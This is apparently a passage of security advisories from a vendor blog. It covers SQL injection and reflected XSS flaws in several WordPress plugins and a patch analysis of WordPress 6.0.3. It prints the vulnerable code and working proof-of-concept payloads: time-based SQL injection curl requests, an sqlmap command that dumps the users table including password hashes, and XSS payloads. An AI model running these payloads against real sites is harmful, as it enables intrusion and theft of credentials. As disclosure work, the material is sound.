  • Converts single < characters to entities
  • Strips all tags
  • Removes line breaks, tabs, and extra whitespace
  • Strips octets

The value of parameter ‘s’ is added to the variable ‘$args’ which is an array used in the call to the WordPress Core function ‘get_posts()’.

// File wp-includes/post.php
// This core function performs the SQL query but does not apply any filtering

function get_posts( $args = null ) {


$get_posts = new WP_Query;
return $get_posts->query( $parsed_args );


Although get_posts() is a WordPress Core function, it is not recommended because get_posts bypasses some filter. See 10up Engineering Best Practices

Proof of Concept:
Note: The same SQL injection/unique request will not work twice in a row right away, as the ‘edd_ajax_download_search()’ function stores the most recent search for 30 seconds (so to run the same payload again, you will have to modify the payload slightly or wait 30 seconds).

time curl "http://TARGET_HOST/wp-admin/admin-ajax.php?action=edd_download_search&s=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(2)))a)--+-"
real 0m2.062s
user 0m0.006s
sys 0m0.009s

CVE-2023–23490 : Survey Maker Authenticated SQL Injection

Affected Versions: < 3.1.2
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSSv3 Score: 8.8

WordPress Survey plugin is a powerful, yet easy-to-use WordPress plugin designed for collecting data from a particular group of people and analyze it. You just need to write a list of questions, configure the settings, save and paste the shortcode of the survey into your website.

The plugin does not escape the ‘surveys_ids’ parameter in the ‘ays_surveys_export_json’ action before using it in a SQL statement, leading to an authenticated SQL injection vulnerability.

The vulnerability requires the attacker to be authenticated but does not require administrator privileges, the following example uses an account with the ‘subscriber’ privilege level.

Subscribers have the fewest permissions and capabilities of all the WordPress roles. It is the default user role set for new registrations.

Vulnerable Code:

public function ays_surveys_export_json() {
global $wpdb;

$surveys_ids = isset($_REQUEST['surveys_ids']) ? array_map( 'sanitize_text_field', $_REQUEST['surveys_ids'] ) : array();

$where = '';
$where = " WHERE id IN (". implode(',', $surveys_ids) .") ";


$sql_surveys = "SELECT * FROM ".$surveys_table.$where;
$surveys = $wpdb->get_results($sql_surveys, 'ARRAY_A');

The part of the vulnerable code corresponds to the ‘ays_surveys_export_json()’ function of the ‘./admin/class-survey-maker-admin.php’ file.

The request is executed without having used $wpdb->prepare() first

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php" --header "$WP_COOKIE" --data "action=ays_surveys_export_json&surveys_ids[0]=1)+AND+(SELECT+1+FROM+(SELECT(SLEEP(3)))a)--+-"
real 0m3.056s
user 0m0.006s
sys 0m0.009s


The vulnerability can also be exploited in error based which facilitates the extraction of data via a tool such as SQLmap

# sqlmap -u "" --cookie="wordpress_e38c3ed8043e3ddf7aa8d7615bce358e=subscriber%7C1674054590%7Cg9hsFPDo9po0OPeS4HN1MuwSbOe3rJ5Y3zunH2z9RD6%7C96429535ce78881cd6f4f4d5c8213b64d75266a7731e3e4d7975f63591d3b3a2" --data="action=ays_surveys_export_json&surveys_ids[0]=1" -p 'surveys_ids[0]' --technique E --dump -T wp_users

Database: wasvwa
Table: wp_users
[2 entries]
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
| 1 | | $P$BPEJq1QWmIm.EEKtbgj/ogVzxGPV4I/ | [email protected] | admin | 0 | admin | admin | 2023-01-16 13:27:28 | <blank> |
| 2 | <blank> | $P$Bo.y4/hfFQWGXUBKrDxivIJImGYEXM. | [email protected] | subscriber | 0 | subscriber | subscriber | 2023-01-16 13:27:39 | <blank> |

CVE-2023–23491 : Quick Event Manager < 9.7.5 Unauthenticated Reflected Cross-Site Scripting

Affected Versions: < 9.7.5
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSSv3 Score: 6.1

A quick and easy to use event creator. Just add new events and publish. The shortcode lists all the events.

The plugin uses the value of the ‘category’ parameter in the response without prior filtering. The vulnerability does not require authentication to be exploited.

Vulnerable Code:

The vulnerable code is present in the function ‘qem_show_calendar()’ of the file ‘legacy/quick-event-manager.php’

// Builds the calendar page
function qem_show_calendar( $atts )
global $qem_calendars ;


$category = '';


if ( isset( $_REQUEST['category'] ) ) {
$category = $_REQUEST['category'];

$calendar .= "\r\n<script type='text/javascript'>\r\n";
$calendar .= "\tqem_calendar_atts[{$c}] = " . json_encode( $atts ) . ";\r\n";
$calendar .= "\tqem_month[{$c}] = {$currentmonth};\r\n";
$calendar .= "\tqem_year[{$c}] = {$currentyear};\r\n";
$calendar .= "\tqem_category[{$c}] = '{$category}';\r\n";
$calendar .= "</script>\r\n";


return $calendar . "</div>";

It’s possible to use the following payload which is reflected in the HTML :


Although the value is inserted in a Javascript variable between simple quotes and it does not seem possible to escape it, the first closing tag ‘</script>’ will have priority in the HTML of the page despite being in a string and allows escaping the context in order to inject arbitrary Javascript code.

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=</script><script>alert(1)</script>&qemyear=a
<div class="qem_calendar" id="qem_calendar_0"><a name="qem_calreload"></a>
<script type='text/javascript'>
qem_calendar_atts[0] = [];
qem_month[0] = 1;
qem_year[0] = ;
qem_category[0] = '</script><script>alert(1)</script>';

CVE-2023–23492 : Login With Form Number < 1.4.2 Unauthenticated Reflected Cross-Site Scripting

Affected Versions: < 1.4.2
CVSSv3 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVSSv3 Score: 6.1

A quick and easy to use event creator. Just add new events and publish. The shortcode lists all the events.

The ‘ID’ parameter of the ‘lwp_forgot_password’ action is used in the response without any filtering leading to an reflected XSS. Although the response is encoded in JSON, the Content-Type of the response is text/html which allows the exploitation of the vulnerability. This vulnerability is present in the ‘./login-with-phonenumber.php’ file in the ‘lwp_forgot_password()’ function.

Vulnerable Code:

Although the response is encoded in JSON, the Content-Type of the response is text/html which allows the exploitation of the vulnerability

function lwp_forgot_password()
$log = '';
if ($_GET['email'] != '' && $_GET['ID']) {
$log = $this->lwp_generate_token($_GET['ID'], $_GET['email'], true);


if ($_GET['phone_number'] != '' && $_GET['ID'] != '') {
$log = $this->lwp_generate_token($_GET['ID'], $_GET['phone_number']);

update_user_meta($_GET['ID'], 'updatedPass', '0');

echo json_encode([
'success' => true,
'ID' => $_GET['ID'],
'log' => $log,
'message' => __('Update password', $this->textdomain)

Proof of Concept:

curl "http://$TARGET_HOST/wp-admin/admin-ajax.php?action=lwp_forgot_password&ID=<svg%20onload=alert(1)>
{"success": true, "ID":"<svg onload=alert(1)>", "log":"", "message:" "Update password"}

Multiples WordPress plugins CVE analysis was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Wordpress 6.0.3 Patch Analysis

31 October 2022 at 11:12


WordPress Core is the most popular web Content Management System (CMS). This free and open-source CMS written in PHP allows developers to develop web applications quickly by allowing customization through plugins and themes. WordPress can work in both a single-site or a multisite installation.

WordPress version 6.0.3 was released on 17 October 2022. As it is a security release, it contains only security patches for multiple vulnerabilities. Rémy Marot and I have analyzed some of these patches and this article focuses on three of these patches.

Stored XSS in WordPress Core via Comment Editing

Wordpress is an OpenSource software, and its code is available on Github. A Github feature allows us to compare the differences between two branches: 6.0.2 and 6.0.3.

The modifications are not too important and the commits / modifications messages are explicit enough to associate a commit to a fix :

With the following information:

  • Vulnerability name: “Stored XSS in WordPress Core via Comment Editing
  • Commit message: “Comments: Apply kses when editing comments.
  • The modified file: “wp-includes/comment.php

It is understandable that comment editing enables stored XSS in Wordpress.

The default Wordpress installation contains a demo “Hello World” article that also contains a comment:

WordPress default homepage

Simply edit the comment with a user having one of the following privileges :

  • Administrator
  • Editor

Because these are the only privileges that have the necessary “unfiltered_html” capabilities to inject HTML code.

Insert a payload such as “<svg onload=alert(1)>” in the comment :

WordPress comment edition

This executes the payload directly on the page of the article where the comment appeared :

XSS payload Execution

An unauthenticated user can exploit this vulnerability with editor or administrator privileges.
Version 6.0.3 fixes this vulnerability by stripping the payload through “add_filter” function :

Sender’s email address is exposed in wp-mail.php & Stored XSS via wp-mail.php

As for the previously described vulnerability, we can continue to associate commits to vulnerabilities.

To give some context to this vulnerability, you should know that it is possible to post articles on WordPress by email.

The principle is simple: you configure WordPress to access a specific email address via the POP protocol. When a user sends an email to the configured address, WordPress automatically creates an article with the subject of the email as the article title and the body of the email as its content.

This feature doesn’t seem to be used often, at least without an additional plugin. The first step is to configure the “Post by Email” feature in the administration interface :

WordPress “Post via Email” configuration panel

Once configured, it is possible to access the page http://wordpress/wp-mail.php even without authentication. Accessing this page triggers the mail harvesting function and display a summary, which also has the effect of leaking the sender’s email.


Once the harvesting task completes, Wordpress automatically creates posts according to the following conditions:

  • If a user is associated with the sender’s email, the post will be created
    - If the user has the necessary privileges, the post will be automatically published. If not, the post will be pending
  • Otherwise the article is created with the admin user but it remains pending

The payload automatically executes on the page of the article or on the homepage of the blog if the article appears there.

An unauthenticated user can exploit this vulnerability, but it still requires them to know the email used for the publications.

Version 6.0.3 fixes this vulnerability by removing the display of the sender in the “wp-mail.php” page and by not creating the post if it contains a payload.

Wordpress 6.0.3 Patch Analysis was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.
